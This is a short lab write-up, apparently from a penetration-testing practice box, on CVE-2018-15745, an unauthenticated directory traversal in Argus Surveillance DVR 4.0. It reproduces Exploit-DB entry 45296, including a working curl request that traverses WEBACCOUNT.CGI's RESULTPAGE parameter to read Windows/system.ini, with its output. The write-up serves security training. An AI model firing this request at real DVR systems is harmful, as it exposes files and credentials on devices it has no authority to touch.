InfoSec LAB

DVR4_CVE-2018-15745

Created: 2 min read

CVE-2018-15745

The target Argus Surveillance DVR instance is vulnerable to CVE-2018-15745 due to its outdated version; 4.0

A vulnerability has been found in Argus Surveillance DVR 4.0.0.0 and classified as critical. This vulnerability affects some unknown processing of the file WEBACCOUNT.CGI. The manipulation of the argument RESULTPAGE with the input value ..%2F leads to a path traversal vulnerability. The CWE definition for the vulnerability is CWE-22. The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory. As an impact it is known to affect confidentiality, and integrity.

Exploit

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/dvr4]
└─$ searchsploit -m windows_x86/webapps/45296.txt ; mv 45296.txt CVE-2018-15745.txt
  Exploit: Argus Surveillance DVR 4.0.0.0 - Directory Traversal
      URL: https://www.exploit-db.com/exploits/45296
     Path: /usr/share/exploitdb/exploits/windows_x86/webapps/45296.txt
    Codes: CVE-2018-15745
 Verified: True
File Type: ASCII text
Copied to: /home/kali/PEN-200/PG_PRACTICE/dvr4/45296.txt

Exploit locally available

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/dvr4]
└─$ cat CVE-2018-15745.txt 
# Exploit: Argus Surveillance DVR 4.0.0.0 - Directory Traversal
# Author: John Page (aka hyp3rlinx)
# Date: 2018-08-28
# Vendor: www.argussurveillance.com
# Software Link: http://www.argussurveillance.com/download/DVR_stp.exe
# CVE: N/A
 
# Description:
# Argus Surveillance DVR 4.0.0.0 devices allow Unauthenticated Directory Traversal,
# leading to File Disclosure via a ..%2F in the WEBACCOUNT.CGI RESULTPAGE parameter.
 
# PoC
 
curl "http://VICTIM-IP:8080/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD="
 
# Result:
 
; for 16-bit app support
woafont=dosapp.fon
EGA80WOA.FON=EGA80WOA.FON
EGA40WOA.FON=EGA40WOA.FON
CGA80WOA.FON=CGA80WOA.FON
CGA40WOA.FON=CGA40WOA.FON
 
wave=mmdrv.dll
timer=timer.drv
 
# https://vimeo.com/287115273
# Greetz: ***Greetz: indoushka | Eduardo | GGA***

N/A

Interactive Graph View

Backlinks